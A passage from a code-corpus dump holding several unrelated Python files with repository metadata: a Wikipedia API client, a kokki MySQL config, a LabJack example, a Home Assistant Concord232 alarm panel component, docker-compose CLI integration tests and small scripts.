result = [(value(buckets, x), ones(x)) for x in range(1 << len(buckets))]
result.sort()
return result
buckets = []
for line in fileinput.input():
buckets.append(int(line))
partition1, partition2 = partition(buckets)
values1 = partitionList(partition1)
values2 = partitionList(partition2)
possible = defaultdict(lambda: 0)
i = 0
target = 150
for entry in values1:
i = bisect.bisect_left(values2, (target - entry[0], 0))
while i < len(values2) and entry[0] + values2[i][0] == target:
possible[entry[1] + values2[i][1]] += 1
i += 1
print("Total possibilities:", sum(possible.values()))
print("Minimal possibilities:", possible[min(possible.keys())])
| 19.238095 | 77 | 0.626238 |
0ef16605213908aae3b64d6fef5fc82ba0dd7d70 | 261 | py | Python | docs/CS161/Star.py | DavidJLu/CCUT | 755cdeaa36f4eac817d09efe29550843fa5a4fdc | [
"MIT"
] | 5 | 2018-06-04T16:11:56.000Z | 2021-02-25T21:59:58.000Z | docs/CS161/Star.py | DavidJLu/CCUT | 755cdeaa36f4eac817d09efe29550843fa5a4fdc | [
"MIT"
] | null | null | null | docs/CS161/Star.py | DavidJLu/CCUT | 755cdeaa36f4eac817d09efe29550843fa5a4fdc | [
"MIT"
] | 1 | 2019-02-21T21:22:55.000Z | 2019-02-21T21:22:55.000Z | #Star.py
#David Lu
import turtle
t = turtle.Turtle()
turtle.bgcolor('white')
t.color('green')
t.width(5)
for i in range(50):
t.forward(150)
t.right(144) # What kind of shape is drawn if we turn right 144 degrees?
turtle.exitonclick()
| 17.4 | 78 | 0.64751 |
603827f16ea000708af6b33ab0dddb552c3131cb | 7,238 | py | Python | api_connector.py | DevopediaOrg/wikipedia-reader | c90eb5431b36449afe493df650284fc18a526616 | [
"MIT"
] | null | null | null | api_connector.py | DevopediaOrg/wikipedia-reader | c90eb5431b36449afe493df650284fc18a526616 | [
"MIT"
] | 1 | 2021-03-31T19:48:39.000Z | 2021-03-31T19:48:39.000Z | api_connector.py | DevopediaOrg/wikipedia-reader | c90eb5431b36449afe493df650284fc18a526616 | [
"MIT"
] | null | null | null | from datetime import datetime, timedelta
import json
import re
import sys
import mwclient
class ApiConnector:
''' Call an API to request an article.
'''
def __init__(self, **kwargs):
self.config = kwargs
if 'endpoint' not in self.config or not self.config['endpoint']:
sys.exit("ERR: API endpoint is missing in configuration. Quitting...")
# Put defaults for some missing configurations
self.func = self.get_parsed_text
if 'func' in self.config:
if getattr(self, self.config['func'], None) is None:
sys.exit("ERR: API function '{}' is missing. Use one of {}. Quitting...".format(
self.config['func'], '(get_text, get_parsed_text, get_info)'))
else:
self.func = getattr(self, self.config['func'])
if 'parse' not in self.config or not self.config['parse']:
self.config['parse'] = 'categories|displaytitle|links|revid|sections|templates|text|wikitext'
if 'query' not in self.config or not self.config['query']:
self.config['query'] = {
'categories': {
'clprop': 'timestamp',
'cllimit': 100
},
'extracts': { # excludes transcluded content
'explaintext': 1,
'exsectionformat' : 'wiki'
},
'info': {
'inprop': 'displaytitle|varianttitles'
},
'pageviews': {},
'redirects': {
'rdprop': 'title',
'rdlimit': 500
},
'revisions': {}, # can't configure for multiple titles
'templates': {
'tllimit': 500
},
'transcludedin': {
'tiprop': 'title|redirect',
'tilimit': 500
}
}
self.site = mwclient.Site(self.config['endpoint'])
self.start_date = (datetime.now() - timedelta(days=365)).strftime('%Y-%m-%d')+'T00:00:00Z'
def get_text(self, title):
''' Give an article title, return the full text in Wikitext format.
The text contains unexpanded transcluded content.
This method makes a single API call.
'''
content = self.site.pages[title]
# Wikitext format: mwclient uses action=query?prop=revisions&rvprop=content|timestamp&rvlimit=1
text = content.text()
# These will each make a separate API call: not ideal way to use mwclient
# content.categories(), content.embeddedin(), content.links(),
# content.revisions(), content.templates()
return {
'title': title,
'text': text
}
def get_parsed_text(self, title):
''' Given an article title, return full text in Wikitext and HTML formats.
Other relevant information are also returned from parsing the article's text.
HTML text contains expanded transcluded content but categories in the footer are
excluded. Wikitext contains all unexpanded transcluded content.
This method makes a single API call.
'''
# Remove targets (section names separated by |) for request but track them for later use
targets = re.findall(r'#(.*)', title)
if targets:
targets = targets[0].split('|')
try:
content = self.site.get('parse', page=title, prop=self.config['parse'], redirects=1)
if 'warnings' in content:
print("WARN: Some warnings in the API response: {}".format(content['warnings']))
except mwclient.errors.APIError:
# one reason is that the page doesn't exist
return {
'title': title,
'text': ''
}
# Post-processing
content['parse']['html'] = content['parse']['text']['*']
content['parse']['text'] = content['parse']['wikitext']['*']
del(content['parse']['wikitext'])
if targets:
content['parse']['targets'] = targets
if 'redirects' in content['parse'] and not content['parse']['redirects']:
del(content['parse']['redirects'])
return content['parse']
def get_info(self, titles):
''' Given one or more article titles, return essential information.
All articles queried with a single API call. However, since there might be lot
of data to retrieve, the response is often paginated, resulting in multiple calls.
Only an extract of the article text is returned, if requested.
'''
childprops = {}
for k, v in self.config['query'].items():
childprops.update(v)
if isinstance(titles, list): # else: called for a single title
titles = "|".join(titles)
props = "|".join(self.config['query'].keys())
continues = {}
# Call multiple times if response is paginated
all_content = []
num_calls = 0
while True:
num_calls += 1
content = self.site.get('query', titles=titles, prop=props, redirects=1, **childprops, **continues)
all_content.append(content)
if 'continue' in content:
continues = content['continue']
else:
break
# Post-process the response to only what we need
cum_content = {}
for content in all_content:
pages = content['query']['pages']
for pgid, pg in pages.items():
#if int(pgid) < 0 and 'missing' in pg:
# # page doesn't exist
# continue
if pgid not in cum_content:
cum_content[pgid] = {}
for k, v in pg.items():
# lists
if k in ('categories', 'redirects','templates', 'transcludedin'):
if k not in cum_content[pgid]:
cum_content[pgid][k] = []
if k == 'templates':
pg[k] = [t for t in v if t['ns'] == 0]
cum_content[pgid][k].extend(pg[k])
# lengths
elif k in ('contributors', 'pageviews'):
if k not in cum_content[pgid]:
cum_content[pgid][k] = 0
if k == 'contributors':
cum_content[pgid][k] += len(v)
else:
cum_content[pgid][k] += sum(count for dt, count in v.items() if count is not None)
elif k == 'extract':
# empty for category pages
# extract may not be full text, is devoid of links and other useful stuff
cum_content[pgid]['text'] = v
# others
else:
cum_content[pgid][k] = v
# Ignore the page ID keys since these are available in the values
cum_content = [v for k, v in cum_content.items()]
return cum_content
| 39.551913 | 111 | 0.520171 |
f3e59bd1574f8eb9faa01ee678f803ddd8ac381f | 1,717 | py | Python | kokki/cookbooks/mysql/metadata.py | samuel/kokki | da98da55e0bba8db5bda993666a43c6fdc4cacdb | [
"BSD-3-Clause"
] | 11 | 2015-01-14T00:43:26.000Z | 2020-12-29T06:12:51.000Z | kokki/cookbooks/mysql/metadata.py | samuel/kokki | da98da55e0bba8db5bda993666a43c6fdc4cacdb | [
"BSD-3-Clause"
] | null | null | null | kokki/cookbooks/mysql/metadata.py | samuel/kokki | da98da55e0bba8db5bda993666a43c6fdc4cacdb | [
"BSD-3-Clause"
] | 3 | 2015-01-14T01:05:56.000Z | 2019-01-26T05:09:37.000Z |
__config__ = {
"mysql.server_root_password": dict(
default = "changeme",
),
"mysql.server_repl_password": dict(
default = None,
),
"mysql.server_debian_password": dict(
default = "changeme",
),
"mysql.grants": dict(
default = [
# dict(user, host, database, password, permissions)
],
),
"mysql.datadir": dict(
description = "Location of MySQL database",
default = "/var/lib/mysql",
),
"mysql.bind_address": dict(
description = "Address that MySQLd should listen on",
default = "127.0.0.1",
),
"mysql.ft_min_word_len": dict(
description = "Minimum word length for items in the full-text index",
default = None,
),
"mysql.tunable.key_buffer": dict(
default = "250M",
),
"mysql.tunable.max_connections": dict(
default = 800,
),
"mysql.tunable.wait_timeout": dict(
default = 180,
),
"mysql.tunable.net_read_timeout": dict(
default = 30,
),
"mysql.tunable.net_write_timeout": dict(
default = 30,
),
"mysql.tunable.back_log": dict(
default = 128,
),
"mysql.tunable.table_cache": dict(
default = 128,
),
"mysql.tunable.max_heap_table_size": dict(
default = "32M",
),
"mysql.tunable.thread_stack": dict(
default = "128K"
),
# Replication
"mysql.server_id": dict(
default = None,
),
"mysql.log_bin": dict(
default = None, # /var/log/mysql/mysql-bin.log
),
"mysql.expire_logs_days": dict(
default = 10,
),
"mysql.max_binlog_size": dict(
default = "100M",
),
} | 24.884058 | 77 | 0.550961 |
1fac4d16b543da618295ee419de36d9e53d115ba | 1,779 | py | Python | Examples/Basic/eNames.py | iconservo/labjack-ljm | f22a47a80c628dcb133b74e6317e1e5617709b19 | [
"MIT"
] | null | null | null | Examples/Basic/eNames.py | iconservo/labjack-ljm | f22a47a80c628dcb133b74e6317e1e5617709b19 | [
"MIT"
] | null | null | null | Examples/Basic/eNames.py | iconservo/labjack-ljm | f22a47a80c628dcb133b74e6317e1e5617709b19 | [
"MIT"
] | 1 | 2019-04-11T06:46:14.000Z | 2019-04-11T06:46:14.000Z | """
Demonstrates how to use the labjack.ljm.eNames (LJM_eNames) function.
"""
from labjack import ljm
# Open first found LabJack
handle = ljm.openS("ANY", "ANY", "ANY") # Any device, Any connection, Any identifier
#handle = ljm.openS("T7", "ANY", "ANY") # T7 device, Any connection, Any identifier
#handle = ljm.openS("T4", "ANY", "ANY") # T4 device, Any connection, Any identifier
#handle = ljm.open(ljm.constants.dtANY, ljm.constants.ctANY, "ANY") # Any device, Any connection, Any identifier
info = ljm.getHandleInfo(handle)
print("Opened a LabJack with Device type: %i, Connection type: %i,\n"
"Serial number: %i, IP address: %s, Port: %i,\nMax bytes per MB: %i" %
(info[0], info[1], info[2], ljm.numberToIP(info[3]), info[4], info[5]))
# Local constants to save screen space
WRITE = ljm.constants.WRITE
READ = ljm.constants.READ
FLOAT32 = ljm.constants.FLOAT32
UINT16 = ljm.constants.UINT16
UINT32 = ljm.constants.UINT32
# Setup and call eNames to write/read values to/from the LabJack.
# Write 2.5V to DAC0,
# write 12345 to TEST_UINT16,
# read TEST_UINT16,
# read serial number,
# read product ID,
# and read firmware version.
numFrames = 6
aNames = ['DAC0', 'TEST_UINT16', 'TEST_UINT16', 'SERIAL_NUMBER', 'PRODUCT_ID',
'FIRMWARE_VERSION']
aWrites = [WRITE, WRITE, READ, READ, READ, READ]
aNumValues = [1, 1, 1, 1, 1, 1]
aValues = [2.5, 12345, 0, 0, 0, 0]
results = ljm.eNames(handle, numFrames, aNames, aWrites, aNumValues, aValues)
print("\neNames results: ")
start = 0
for i in range(numFrames):
end = start + aNumValues[i]
print(" Name - %16s, write - %i, values %s" %
(aNames[i], aWrites[i], results[start:end]))
start = end
# Close handle
ljm.close(handle)
| 34.882353 | 114 | 0.661608 |
0bdcf274c0874db6db3c6773d205c3f1659f74c8 | 4,041 | py | Python | homeassistant/components/alarm_control_panel/concord232.py | mbs-technologie/home-assistant | 71fc446425cbb1c0d4670c261ce8ea3bfd83a73d | [
"MIT"
] | 13 | 2017-02-01T13:25:34.000Z | 2022-01-26T01:30:39.000Z | homeassistant/components/alarm_control_panel/concord232.py | mbs-technologie/home-assistant | 71fc446425cbb1c0d4670c261ce8ea3bfd83a73d | [
"MIT"
] | 9 | 2017-07-26T18:05:32.000Z | 2021-12-05T14:16:34.000Z | homeassistant/components/alarm_control_panel/concord232.py | mbs-technologie/home-assistant | 71fc446425cbb1c0d4670c261ce8ea3bfd83a73d | [
"MIT"
] | 21 | 2017-07-26T17:09:40.000Z | 2022-03-27T22:37:22.000Z | """
Support for Concord232 alarm control panels.
For more details about this platform, please refer to the documentation at
https://home-assistant.io/components/alarm_control_panel.concord232/
"""
import datetime
import logging
import requests
import voluptuous as vol
import homeassistant.components.alarm_control_panel as alarm
from homeassistant.components.alarm_control_panel import PLATFORM_SCHEMA
from homeassistant.const import (
CONF_HOST, CONF_NAME, CONF_PORT, STATE_ALARM_ARMED_AWAY,
STATE_ALARM_ARMED_HOME, STATE_ALARM_DISARMED, STATE_UNKNOWN)
import homeassistant.helpers.config_validation as cv
REQUIREMENTS = ['concord232==0.14']
_LOGGER = logging.getLogger(__name__)
DEFAULT_HOST = 'localhost'
DEFAULT_NAME = 'CONCORD232'
DEFAULT_PORT = 5007
SCAN_INTERVAL = 1
PLATFORM_SCHEMA = PLATFORM_SCHEMA.extend({
vol.Optional(CONF_PORT, default=DEFAULT_PORT): cv.port,
vol.Optional(CONF_NAME, default=DEFAULT_NAME): cv.string,
vol.Optional(CONF_HOST, default=DEFAULT_HOST): cv.string,
})
def setup_platform(hass, config, add_devices, discovery_info=None):
"""Set up the Concord232 alarm control panel platform."""
name = config.get(CONF_NAME)
host = config.get(CONF_HOST)
port = config.get(CONF_PORT)
url = 'http://{}:{}'.format(host, port)
try:
add_devices([Concord232Alarm(hass, url, name)])
except requests.exceptions.ConnectionError as ex:
_LOGGER.error("Unable to connect to Concord232: %s", str(ex))
return False
class Concord232Alarm(alarm.AlarmControlPanel):
"""Represents the Concord232-based alarm panel."""
def __init__(self, hass, url, name):
"""Initialize the Concord232 alarm panel."""
from concord232 import client as concord232_client
self._state = STATE_UNKNOWN
self._hass = hass
self._name = name
self._url = url
try:
client = concord232_client.Client(self._url)
except requests.exceptions.ConnectionError as ex:
_LOGGER.error("Unable to connect to Concord232: %s", str(ex))
self._alarm = client
self._alarm.partitions = self._alarm.list_partitions()
self._alarm.last_partition_update = datetime.datetime.now()
self.update()
@property
def should_poll(self):
"""Polling needed."""
return True
@property
def name(self):
"""Return the name of the device."""
return self._name
@property
def code_format(self):
"""The characters if code is defined."""
return '[0-9]{4}([0-9]{2})?'
@property
def state(self):
"""Return the state of the device."""
return self._state
def update(self):
"""Update values from API."""
try:
part = self._alarm.list_partitions()[0]
except requests.exceptions.ConnectionError as ex:
_LOGGER.error("Unable to connect to %(host)s: %(reason)s",
dict(host=self._url, reason=ex))
newstate = STATE_UNKNOWN
except IndexError:
_LOGGER.error("Concord232 reports no partitions")
newstate = STATE_UNKNOWN
if part['arming_level'] == 'Off':
newstate = STATE_ALARM_DISARMED
elif 'Home' in part['arming_level']:
newstate = STATE_ALARM_ARMED_HOME
else:
newstate = STATE_ALARM_ARMED_AWAY
if not newstate == self._state:
_LOGGER.info("State Chnage from %s to %s", self._state, newstate)
self._state = newstate
return self._state
def alarm_disarm(self, code=None):
"""Send disarm command."""
self._alarm.disarm(code)
def alarm_arm_home(self, code=None):
"""Send arm home command."""
self._alarm.arm('home')
def alarm_arm_away(self, code=None):
"""Send arm away command."""
self._alarm.arm('auto')
def alarm_trigger(self, code=None):
"""Alarm trigger command."""
raise NotImplementedError()
| 30.383459 | 77 | 0.657511 |
df3eec66d080f455241dcee22f5366f6e569a9b8 | 18,477 | py | Python | tests/integration/cli_test.py | btaitelb/compose | 43369cda9ce5f0fe4860c7160cfa6550d31e2417 | [
"Apache-2.0"
] | null | null | null | tests/integration/cli_test.py | btaitelb/compose | 43369cda9ce5f0fe4860c7160cfa6550d31e2417 | [
"Apache-2.0"
] | 1 | 2021-03-26T00:41:22.000Z | 2021-03-26T00:41:22.000Z | tests/integration/cli_test.py | btaitelb/compose | 43369cda9ce5f0fe4860c7160cfa6550d31e2417 | [
"Apache-2.0"
] | 1 | 2020-04-13T17:43:26.000Z | 2020-04-13T17:43:26.000Z | from __future__ import absolute_import
import sys
import os
from six import StringIO
from mock import patch
from .testcases import DockerClientTestCase
from compose.cli.main import TopLevelCommand
class CLITestCase(DockerClientTestCase):
def setUp(self):
super(CLITestCase, self).setUp()
self.old_sys_exit = sys.exit
sys.exit = lambda code=0: None
self.command = TopLevelCommand()
self.command.base_dir = 'tests/fixtures/simple-composefile'
def tearDown(self):
sys.exit = self.old_sys_exit
self.project.kill()
self.project.remove_stopped()
@property
def project(self):
# Hack: allow project to be overridden. This needs refactoring so that
# the project object is built exactly once, by the command object, and
# accessed by the test case object.
if hasattr(self, '_project'):
return self._project
return self.command.get_project(self.command.get_config_path())
def test_help(self):
old_base_dir = self.command.base_dir
self.command.base_dir = 'tests/fixtures/no-composefile'
with self.assertRaises(SystemExit) as exc_context:
self.command.dispatch(['help', 'up'], None)
self.assertIn('Usage: up [options] [SERVICE...]', str(exc_context.exception))
# self.project.kill() fails during teardown
# unless there is a composefile.
self.command.base_dir = old_base_dir
# TODO: address the "Inappropriate ioctl for device" warnings in test output
@patch('sys.stdout', new_callable=StringIO)
def test_ps(self, mock_stdout):
self.project.get_service('simple').create_container()
self.command.dispatch(['ps'], None)
self.assertIn('simplecomposefile_simple_1', mock_stdout.getvalue())
@patch('sys.stdout', new_callable=StringIO)
def test_ps_default_composefile(self, mock_stdout):
self.command.base_dir = 'tests/fixtures/multiple-composefiles'
self.command.dispatch(['up', '-d'], None)
self.command.dispatch(['ps'], None)
output = mock_stdout.getvalue()
self.assertIn('multiplecomposefiles_simple_1', output)
self.assertIn('multiplecomposefiles_another_1', output)
self.assertNotIn('multiplecomposefiles_yetanother_1', output)
@patch('sys.stdout', new_callable=StringIO)
def test_ps_alternate_composefile(self, mock_stdout):
self.command.base_dir = 'tests/fixtures/multiple-composefiles'
self.command.dispatch(['-f', 'compose2.yml', 'up', '-d'], None)
self.command.dispatch(['-f', 'compose2.yml', 'ps'], None)
output = mock_stdout.getvalue()
self.assertNotIn('multiplecomposefiles_simple_1', output)
self.assertNotIn('multiplecomposefiles_another_1', output)
self.assertIn('multiplecomposefiles_yetanother_1', output)
@patch('compose.service.log')
def test_pull(self, mock_logging):
self.command.dispatch(['pull'], None)
mock_logging.info.assert_any_call('Pulling simple (busybox:latest)...')
mock_logging.info.assert_any_call('Pulling another (busybox:latest)...')
@patch('sys.stdout', new_callable=StringIO)
def test_build_no_cache(self, mock_stdout):
self.command.base_dir = 'tests/fixtures/simple-dockerfile'
self.command.dispatch(['build', 'simple'], None)
mock_stdout.truncate(0)
cache_indicator = 'Using cache'
self.command.dispatch(['build', 'simple'], None)
output = mock_stdout.getvalue()
self.assertIn(cache_indicator, output)
mock_stdout.truncate(0)
self.command.dispatch(['build', '--no-cache', 'simple'], None)
output = mock_stdout.getvalue()
self.assertNotIn(cache_indicator, output)
def test_up(self):
self.command.dispatch(['up', '-d'], None)
service = self.project.get_service('simple')
another = self.project.get_service('another')
self.assertEqual(len(service.containers()), 1)
self.assertEqual(len(another.containers()), 1)
# Ensure containers don't have stdin and stdout connected in -d mode
config = service.containers()[0].inspect()['Config']
self.assertFalse(config['AttachStderr'])
self.assertFalse(config['AttachStdout'])
self.assertFalse(config['AttachStdin'])
def test_up_with_links(self):
self.command.base_dir = 'tests/fixtures/links-composefile'
self.command.dispatch(['up', '-d', 'web'], None)
web = self.project.get_service('web')
db = self.project.get_service('db')
console = self.project.get_service('console')
self.assertEqual(len(web.containers()), 1)
self.assertEqual(len(db.containers()), 1)
self.assertEqual(len(console.containers()), 0)
def test_up_with_no_deps(self):
self.command.base_dir = 'tests/fixtures/links-composefile'
self.command.dispatch(['up', '-d', '--no-deps', 'web'], None)
web = self.project.get_service('web')
db = self.project.get_service('db')
console = self.project.get_service('console')
self.assertEqual(len(web.containers()), 1)
self.assertEqual(len(db.containers()), 0)
self.assertEqual(len(console.containers()), 0)
def test_up_with_recreate(self):
self.command.dispatch(['up', '-d'], None)
service = self.project.get_service('simple')
self.assertEqual(len(service.containers()), 1)
old_ids = [c.id for c in service.containers()]
self.command.dispatch(['up', '-d'], None)
self.assertEqual(len(service.containers()), 1)
new_ids = [c.id for c in service.containers()]
self.assertNotEqual(old_ids, new_ids)
def test_up_with_keep_old(self):
self.command.dispatch(['up', '-d'], None)
service = self.project.get_service('simple')
self.assertEqual(len(service.containers()), 1)
old_ids = [c.id for c in service.containers()]
self.command.dispatch(['up', '-d', '--no-recreate'], None)
self.assertEqual(len(service.containers()), 1)
new_ids = [c.id for c in service.containers()]
self.assertEqual(old_ids, new_ids)
@patch('dockerpty.start')
def test_run_service_without_links(self, mock_stdout):
self.command.base_dir = 'tests/fixtures/links-composefile'
self.command.dispatch(['run', 'console', '/bin/true'], None)
self.assertEqual(len(self.project.containers()), 0)
# Ensure stdin/out was open
container = self.project.containers(stopped=True, one_off=True)[0]
config = container.inspect()['Config']
self.assertTrue(config['AttachStderr'])
self.assertTrue(config['AttachStdout'])
self.assertTrue(config['AttachStdin'])
@patch('dockerpty.start')
def test_run_service_with_links(self, __):
self.command.base_dir = 'tests/fixtures/links-composefile'
self.command.dispatch(['run', 'web', '/bin/true'], None)
db = self.project.get_service('db')
console = self.project.get_service('console')
self.assertEqual(len(db.containers()), 1)
self.assertEqual(len(console.containers()), 0)
@patch('dockerpty.start')
def test_run_with_no_deps(self, __):
self.command.base_dir = 'tests/fixtures/links-composefile'
self.command.dispatch(['run', '--no-deps', 'web', '/bin/true'], None)
db = self.project.get_service('db')
self.assertEqual(len(db.containers()), 0)
@patch('dockerpty.start')
def test_run_does_not_recreate_linked_containers(self, __):
self.command.base_dir = 'tests/fixtures/links-composefile'
self.command.dispatch(['up', '-d', 'db'], None)
db = self.project.get_service('db')
self.assertEqual(len(db.containers()), 1)
old_ids = [c.id for c in db.containers()]
self.command.dispatch(['run', 'web', '/bin/true'], None)
self.assertEqual(len(db.containers()), 1)
new_ids = [c.id for c in db.containers()]
self.assertEqual(old_ids, new_ids)
@patch('dockerpty.start')
def test_run_without_command(self, __):
self.command.base_dir = 'tests/fixtures/commands-composefile'
self.check_build('tests/fixtures/simple-dockerfile', tag='composetest_test')
for c in self.project.containers(stopped=True, one_off=True):
c.remove()
self.command.dispatch(['run', 'implicit'], None)
service = self.project.get_service('implicit')
containers = service.containers(stopped=True, one_off=True)
self.assertEqual(
[c.human_readable_command for c in containers],
[u'/bin/sh -c echo "success"'],
)
self.command.dispatch(['run', 'explicit'], None)
service = self.project.get_service('explicit')
containers = service.containers(stopped=True, one_off=True)
self.assertEqual(
[c.human_readable_command for c in containers],
[u'/bin/true'],
)
@patch('dockerpty.start')
def test_run_service_with_entrypoint_overridden(self, _):
self.command.base_dir = 'tests/fixtures/dockerfile_with_entrypoint'
name = 'service'
self.command.dispatch(
['run', '--entrypoint', '/bin/echo', name, 'helloworld'],
None
)
service = self.project.get_service(name)
container = service.containers(stopped=True, one_off=True)[0]
self.assertEqual(
container.human_readable_command,
u'/bin/echo helloworld'
)
@patch('dockerpty.start')
def test_run_service_with_user_overridden(self, _):
self.command.base_dir = 'tests/fixtures/user-composefile'
name = 'service'
user = 'sshd'
args = ['run', '--user={}'.format(user), name]
self.command.dispatch(args, None)
service = self.project.get_service(name)
container = service.containers(stopped=True, one_off=True)[0]
self.assertEqual(user, container.get('Config.User'))
@patch('dockerpty.start')
def test_run_service_with_user_overridden_short_form(self, _):
self.command.base_dir = 'tests/fixtures/user-composefile'
name = 'service'
user = 'sshd'
args = ['run', '-u', user, name]
self.command.dispatch(args, None)
service = self.project.get_service(name)
container = service.containers(stopped=True, one_off=True)[0]
self.assertEqual(user, container.get('Config.User'))
@patch('dockerpty.start')
def test_run_service_with_environement_overridden(self, _):
name = 'service'
self.command.base_dir = 'tests/fixtures/environment-composefile'
self.command.dispatch(
['run', '-e', 'foo=notbar', '-e', 'allo=moto=bobo',
'-e', 'alpha=beta', name],
None
)
service = self.project.get_service(name)
container = service.containers(stopped=True, one_off=True)[0]
# env overriden
self.assertEqual('notbar', container.environment['foo'])
# keep environement from yaml
self.assertEqual('world', container.environment['hello'])
# added option from command line
self.assertEqual('beta', container.environment['alpha'])
# make sure a value with a = don't crash out
self.assertEqual('moto=bobo', container.environment['allo'])
@patch('dockerpty.start')
def test_run_service_without_map_ports(self, __):
# create one off container
self.command.base_dir = 'tests/fixtures/ports-composefile'
self.command.dispatch(['run', '-d', 'simple'], None)
container = self.project.get_service('simple').containers(one_off=True)[0]
# get port information
port_random = container.get_local_port(3000)
port_assigned = container.get_local_port(3001)
# close all one off containers we just created
container.stop()
# check the ports
self.assertEqual(port_random, None)
self.assertEqual(port_assigned, None)
@patch('dockerpty.start')
def test_run_service_with_map_ports(self, __):
# create one off container
self.command.base_dir = 'tests/fixtures/ports-composefile'
self.command.dispatch(['run', '-d', '--service-ports', 'simple'], None)
container = self.project.get_service('simple').containers(one_off=True)[0]
# get port information
port_random = container.get_local_port(3000)
port_assigned = container.get_local_port(3001)
# close all one off containers we just created
container.stop()
# check the ports
self.assertNotEqual(port_random, None)
self.assertIn("0.0.0.0", port_random)
self.assertEqual(port_assigned, "0.0.0.0:49152")
def test_rm(self):
service = self.project.get_service('simple')
service.create_container()
service.kill()
self.assertEqual(len(service.containers(stopped=True)), 1)
self.command.dispatch(['rm', '--force'], None)
self.assertEqual(len(service.containers(stopped=True)), 0)
service = self.project.get_service('simple')
service.create_container()
service.kill()
self.assertEqual(len(service.containers(stopped=True)), 1)
self.command.dispatch(['rm', '-f'], None)
self.assertEqual(len(service.containers(stopped=True)), 0)
def test_kill(self):
self.command.dispatch(['up', '-d'], None)
service = self.project.get_service('simple')
self.assertEqual(len(service.containers()), 1)
self.assertTrue(service.containers()[0].is_running)
self.command.dispatch(['kill'], None)
self.assertEqual(len(service.containers(stopped=True)), 1)
self.assertFalse(service.containers(stopped=True)[0].is_running)
def test_kill_signal_sigint(self):
self.command.dispatch(['up', '-d'], None)
service = self.project.get_service('simple')
self.assertEqual(len(service.containers()), 1)
self.assertTrue(service.containers()[0].is_running)
self.command.dispatch(['kill', '-s', 'SIGINT'], None)
self.assertEqual(len(service.containers()), 1)
# The container is still running. It has been only interrupted
self.assertTrue(service.containers()[0].is_running)
def test_kill_interrupted_service(self):
self.command.dispatch(['up', '-d'], None)
service = self.project.get_service('simple')
self.command.dispatch(['kill', '-s', 'SIGINT'], None)
self.assertTrue(service.containers()[0].is_running)
self.command.dispatch(['kill', '-s', 'SIGKILL'], None)
self.assertEqual(len(service.containers(stopped=True)), 1)
self.assertFalse(service.containers(stopped=True)[0].is_running)
def test_restart(self):
service = self.project.get_service('simple')
container = service.create_container()
service.start_container(container)
started_at = container.dictionary['State']['StartedAt']
self.command.dispatch(['restart'], None)
container.inspect()
self.assertNotEqual(
container.dictionary['State']['FinishedAt'],
'0001-01-01T00:00:00Z',
)
self.assertNotEqual(
container.dictionary['State']['StartedAt'],
started_at,
)
def test_scale(self):
project = self.project
self.command.scale(project, {'SERVICE=NUM': ['simple=1']})
self.assertEqual(len(project.get_service('simple').containers()), 1)
self.command.scale(project, {'SERVICE=NUM': ['simple=3', 'another=2']})
self.assertEqual(len(project.get_service('simple').containers()), 3)
self.assertEqual(len(project.get_service('another').containers()), 2)
self.command.scale(project, {'SERVICE=NUM': ['simple=1', 'another=1']})
self.assertEqual(len(project.get_service('simple').containers()), 1)
self.assertEqual(len(project.get_service('another').containers()), 1)
self.command.scale(project, {'SERVICE=NUM': ['simple=1', 'another=1']})
self.assertEqual(len(project.get_service('simple').containers()), 1)
self.assertEqual(len(project.get_service('another').containers()), 1)
self.command.scale(project, {'SERVICE=NUM': ['simple=0', 'another=0']})
self.assertEqual(len(project.get_service('simple').containers()), 0)
self.assertEqual(len(project.get_service('another').containers()), 0)
def test_port(self):
self.command.base_dir = 'tests/fixtures/ports-composefile'
self.command.dispatch(['up', '-d'], None)
container = self.project.get_service('simple').get_container()
@patch('sys.stdout', new_callable=StringIO)
def get_port(number, mock_stdout):
self.command.dispatch(['port', 'simple', str(number)], None)
return mock_stdout.getvalue().rstrip()
self.assertEqual(get_port(3000), container.get_local_port(3000))
self.assertEqual(get_port(3001), "0.0.0.0:49152")
self.assertEqual(get_port(3002), "")
def test_env_file_relative_to_compose_file(self):
config_path = os.path.abspath('tests/fixtures/env-file/docker-compose.yml')
self.command.dispatch(['-f', config_path, 'up', '-d'], None)
self._project = self.command.get_project(config_path)
containers = self.project.containers(stopped=True)
self.assertEqual(len(containers), 1)
self.assertIn("FOO=1", containers[0].get('Config.Env'))
def test_up_with_extends(self):
self.command.base_dir = 'tests/fixtures/extends'
self.command.dispatch(['up', '-d'], None)
self.assertEqual(
set([s.name for s in self.project.services]),
set(['mydb', 'myweb']),
)
# Sort by name so we get [db, web]
containers = sorted(
self.project.containers(stopped=True),
key=lambda c: c.name,
)
self.assertEqual(len(containers), 2)
web = containers[1]
self.assertEqual(set(web.links()), set(['db', 'mydb_1', 'extends_mydb_1']))
expected_env = set([
"FOO=1",
"BAR=2",
"BAZ=2",
])
self.assertTrue(expected_env <= set(web.get('Config.Env')))
| 40.431072 | 89 | 0.642853 |
4c1f6dee7985283c9f33e58bdad5f5da63dda60c | 111 | py | Python | tools/Polygraphy/polygraphy/backend/base/__init__.py | martellz/TensorRT | f182e83b30b5d45aaa3f9a041ff8b3ce83e366f4 | [
"Apache-2.0"
] | 4 | 2021-04-16T13:49:38.000Z | 2022-01-16T08:58:07.000Z | tools/Polygraphy/polygraphy/backend/base/__init__.py | martellz/TensorRT | f182e83b30b5d45aaa3f9a041ff8b3ce83e366f4 | [
"Apache-2.0"
] | null | null | null | tools/Polygraphy/polygraphy/backend/base/__init__.py | martellz/TensorRT | f182e83b30b5d45aaa3f9a041ff8b3ce83e366f4 | [
"Apache-2.0"
] | 2 | 2021-02-04T14:46:10.000Z | 2021-02-04T14:56:08.000Z | from polygraphy.backend.base.loader import BaseLoadModel
from polygraphy.backend.base.runner import BaseRunner
| 37 | 56 | 0.873874 |
eb093ca0353c2f7c2aa942dfbc51dbfc8746228c | 215 | py | Python | PyATS/ex5_vlans/job1.py | dmmar/netascode | 1d15e717b600d38bd33a65fa110e1c129d72e5df | [
"MIT"
] | 36 | 2019-07-17T17:00:32.000Z | 2022-03-26T09:34:40.000Z | PyATS/ex5_vlans/job1.py | dmmar/netascode | 1d15e717b600d38bd33a65fa110e1c129d72e5df | [
"MIT"
] | 4 | 2021-03-31T19:16:53.000Z | 2021-12-13T20:01:57.000Z | PyATS/ex5_vlans/job1.py | dmmar/netascode | 1d15e717b600d38bd33a65fa110e1c129d72e5df | [
"MIT"
] | 10 | 2019-07-31T07:58:03.000Z | 2021-10-13T04:45:45.000Z | # Example: job1.py
# -------------------
#
# a simple job file for the script above
from pyats.easypy import run
def main():
# run api launches a testscript as an individual task.
run('vlans_check.py')
